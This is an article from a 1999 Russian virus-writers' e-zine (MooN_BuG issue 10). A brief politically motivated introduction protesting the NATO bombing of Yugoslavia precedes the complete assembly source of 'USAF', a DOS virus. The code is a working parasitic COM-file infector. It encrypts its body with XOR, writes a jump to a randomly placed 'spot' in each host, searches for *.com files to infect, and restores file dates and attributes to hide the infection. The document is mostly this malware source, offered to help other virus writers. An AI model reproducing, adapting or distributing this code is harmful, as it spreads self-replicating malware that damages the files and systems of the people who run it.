[TulaAnti&ViralClub] PRESENTS ...
MooN_BuG, Issue 10, Apr 1999                                          file 007

         -* Just virus, United States Air Force version 0.90 (BETA) *-

                              Copy-ya-right (c) March 1999, Mongoose of -=MY=-


    Представляя этот вирус вам,  я поступаю против своих принципов и принципов
 группы Misdirected Youth, т.к. этот журнал и вирус сразу же после выпуска по-
 падет в руки аверов. Хотя этот вирус показывает, что я думаю о бомбежке Югос-
 лавии. Но  этот вирус так же может помоч вирмейкерам разобраться с шифровкой.
 Комментарии как всегда на английском языке. =))

    Метод заражения вируса USAF v0.90:

      ┌──────┐
   ┌─>│ JUMP │─┐  Джамп на пятно (JMP SPOT + INFECTION MARKER)
   │  │ XXXX │ │
   │┌─│ SPOT │<┘  Пятно, оно представляет из себя CALL CODE (переход к телу
   ││ │ XXXX │   вируса) + 6 байт "мусора"
   ││ ├──────┤
   │└>│ CODE │    Собственно тело вируса, делает дела, востанавливает байты
   └──└──────┘   под пятном и на 100h, затем передает управление на 100h

─────[USAF.ASM]──────[START]──────────────────────────────────────────────────
;┌───────────────────────────────────────────────────────────────────────────┐
;│ USAF version 0.90 (BETA) [C] Mongoose of Misdirected Youth, March '99     │
;├───────────────────────────────────────────────────────────────────────────┤
;│ Virii Type:      COM.CRYPT.VIRUS (parasitic)                              │
;│ Stealth:         Save date, time & attributes                             │
;│ Error Handler:   Yep                                                      │
;│ Virii Size:      618                                                      │
;│ Need to compile: Compile with one pass                                    │
;└───────────────────────────────────────────────────────────────────────────┘
               .model tiny
               .code
                org   100h
 spot_length           equ 9                    ; Spot length

 start:         sub    bp,bp                    ; Zero register
                jmp    restore_orig

 real_start:    mov    dx,0                     ; Key to decrypt code
 code_offset:   mov    bx,0                     ; Code offset
                mov    cx,(string-original)     ; Code size
 decrypt_cycle: xor    byte ptr [bx],dl
                inc    dx
                xor    byte ptr [bx],dh
                inc    bx
                loop   decrypt_cycle

 original:      pop    di                       ; Get spot position-3
                sub    di,3                     ; Calculate spot position

                call   calculate_ip             ; Calculate DELTA offset (IP)
 calculate_ip:  pop    si
                xchg   bp,si
                sub    bp,offset calculate_ip

 restore_spot:  lea    si,[bp+spot]             ; Restore original bytes under
                mov    cx,spot_length           ; spot
                cld
                rep    movsb

 restore_orig:  mov    di,100h                  ; Restore original bytes
                lea    si,[bp+original_bytes]
                movsw
                movsw

 set_seed:      in     ax,40h                   ; Genate seed for RNG
                mov    word ptr [bp+seed],ax    ; Put seed

 set_new_dta:   mov    ah,1ah                   ; Set new DTA
                lea    dx,[bp+dta]
                int    21h

                mov    ax,3524h                 ; Get orig Int 24h
                int    21h

                mov    word ptr [bp+old_int24],bx
                mov    word ptr [bp+old_int24+2],es

                mov    ax,2524h                 ; Set new handler
                lea    dx,[bp+new_int24]
                int    21h

                push   cs
                pop    es

 find_first:    mov    ah,4eh                   ; Find first COM-file
                mov    cx,7
                lea    dx,[bp+file_mask]        ; File mask
 find_next:     int    21h
                jnc    get_attrib               ; Jump if okey
                jmp    return_control           ; Jump if error

 get_attrib:    mov    ax,4300h                 ; Get attributes
                lea    dx,[bp+dta+1eh]
                int    21h

                mov    word ptr [bp+attribs],cx ; Save attributes

                mov    ax,4301h                 ; Clear attributes
                sub    cx,cx
                lea    dx,[bp+dta+1eh]
                int    21h

 open_file:     mov    ax,3d02h                 ; Open for read'n'write
                lea    dx,[bp+dta+1eh]          ; Filename
                int    21h
                jc     close_file               ; Jump if error
                xchg   bx,ax                    ; Move file handle to BX

                mov    ax,5700h                 ; Get file date and time
                int    21h

                mov    word ptr [bp+time],cx    ; Save time
                mov    word ptr [bp+date],dx    ; Save date

                mov    cx,word ptr [bp+dta+1ah] ; File size
                cmp    cx,1000                  ; Check file size
                jb     close_file
                cmp    cx,64000
                ja     close_file

                mov    ah,3fh                   ; Read first 4 bytes
                mov    cx,4
                lea    dx,[bp+original_bytes]
                int    21h

                cmp    byte ptr [bp+original_bytes+3],5
                jz     close_file               ; Jump if infected

                cmp    word ptr [bp+original_bytes],'ZM'
                jz     close_file               ; Jump if EXE

 again:         mov    cx,word ptr [bp+dta+1ah] ; File size
                sub    cx,100
                call   get_rnd_number           ; Get rnd number from 0 to CX
                cmp    ax,100
                jb     again                    ; Jump if 100 or lower

                call   make_spot                ; Make spot

 close_file:    mov    ax,5701h                 ; Restore orig date and time
                lea    cx,[bp+time]
                lea    dx,[bp+date]
                int    21h

                mov    ah,3eh                   ; Close file
                int    21h

                mov    ax,4301h                 ; Restore file attributes
                mov    cx,[bp+attribs]
                lea    dx,[bp+dta+1eh]
                int    21h

                mov    ah,4fh                   ; Find next file
                jmp    find_next
                       db 'А ты бомбил Югославию?',0
                       db 'Help NATO, before it''s not too late!'
 return_control:mov    ax,2524h                 ; Restore old int 24 handler
                lea    dx,[bp+old_int24]
                int    21h

                push   cs
                pop    ds

                mov    ah,1ah                   ; Restore DTA
                mov    dx,80h
                int    21h

                mov    ax,100h                  ; Jump to 100h (file begin)
                jmp    ax
                       db 'USAF by Mongoose / Misdirected Youth'
;┌────────────────────────────────────────────────────────────────────────────
;│ Generate'n'write SPOT
;└────────────────────────────────────────────────────────────────────────────
 make_spot:     mov    ax,4200h                 ; Move pointer to spot location
                sub    cx,cx
                mov    dx,si
                push   cx dx
                int    21h

                mov    ah,3fh                   ; Read bytes "under spot"
                mov    cx,spot_length           ; Spot length
                lea    dx,[bp+spot]             ; Buffer to save bytes
                int    21h

                mov    cx,word ptr [bp+dta+1ah] ; Generate spot
                sub    cx,si                    ; Get JMP REAL_START
                sub    cx,3
                mov    word ptr [bp+spot_buf+1],cx
                mov    byte ptr [bp+spot_buf],0e8h
                mov    word ptr [bp+spot_buf+3],di

                mov    ax,4200h                 ; Move pointer to spot location
                pop    dx cx
                int    21h

                mov    ah,40h                   ; Write spot
                mov    cx,spot_length           ; Spot length
                lea    dx,[bp+spot_buf]
                int    21h
;┌────────────────────────────────────────────────────────────────────────────
;│ Infect file
;└────────────────────────────────────────────────────────────────────────────
 infect:        mov    cx,si                    ; Generate jump to SPOT
                sub    cx,3
                mov    word ptr [bp+buffer+1],cx; Spot location
                mov    byte ptr [bp+buffer],0e9h; JMP instruction
                mov    byte ptr [bp+buffer+3],5 ; Infection marker

                mov    ax,4200h
                sub    cx,cx
                cwd
                int    21h

                mov    ah,40h                   ; Write JMP
                mov    cx,4
                lea    dx,[bp+buffer]
                int    21h

                mov    ax,4202h                 ; Move pointer to end of file
                sub    cx,cx
                cwd
                int    21h

                in     ax,40h                   ; Key to decrypt code
                xchg   cx,ax
                call   get_rnd_number
                mov    word ptr [bp+real_start+1],ax
                mov    cx,word ptr [bp+dta+1ah] ; Crypted code location in file
                add    cx,(original-real_start)+100h
                mov    word ptr [bp+code_offset+1],cx

                lea    di,[bp+xor_buffer]
                lea    si,[bp+real_start]
                mov    cx,(end_of_code-real_start)
                push   di                       ; Save code location
                cld
                rep    movsb

                pop    di                       ; Restore code location
                add    di,(original-real_start)
                mov    cx,(string-original)
 crypt_cycle:   xor    byte ptr [di],al
                inc    ax
                xor    byte ptr [di],ah
                inc    di
                loop   crypt_cycle

                mov    ah,40h
                mov    cx,(end_of_code-real_start)
                lea    dx,[bp+xor_buffer]
                int    21h
                ret
;┌────────────────────────────────────────────────────────────────────────────
;│ New int 24 handler
;└────────────────────────────────────────────────────────────────────────────
 new_int24:     mov    al,3
                iret
;┌─────────────────────────┬──────────────────────────────────────────────────
;│ Random number generator │ Generate random number from 0 to CX
;└─────────────────────────┴──────────────────────────────────────────────────
 get_rnd_number:push   bx cx
                mov    ax,[bp+seed]
                mov    bx,261
                mul    bx
                mov    bx,65521
                div    bx
                or     dx,dx
                jnz    okey
                inc    word ptr [bp+seed]
                jmp    get_rnd_number

 okey:          mov    word ptr [bp+seed],dx
                mov    ax,dx
                sub    dx,dx
                div    cx
                mov    ax,dx
                pop    cx bx
                ret
;┌────────────────────────────────────────────────────────────────────────────
;│ DATA
;└────────────────────────────────────────────────────────────────────────────
 file_mask             db '*.com',0             ; File length
 spot                  db 9 dup (?)
 original_bytes        db 0cdh,20h,?,?          ; Original bytes
 string                db 'Misdirected Youth'
 end_of_code    label  byte
;┌────────────────────────────────────────────────────────────────────────────
;│ HEAP
;└────────────────────────────────────────────────────────────────────────────
 dta                   db 43 dup (?)            ; Temporary DTA
 seed                  dw ?                     ; Seed for RNG
 date                  dw ?                     ; For date
 time                  dw ?                     ; For time
 buffer                db 4 dup (?)             ; Temporary buffer
 attribs               dw ?                     ; For attrib
 spot_buf              db spot_length dup (?)   ; Temporary spot buffer
 old_int24             dd ?                     ; Old Int 24 handler
 xor_buffer            db (end_of_code-real_start) dup (?)

                end    start
─────[USAF.ASM]──────[EOF]─────────────────────────────────────────────────────

                              Copy-ya-right (c) March 1999, Mongoose of -=MY=-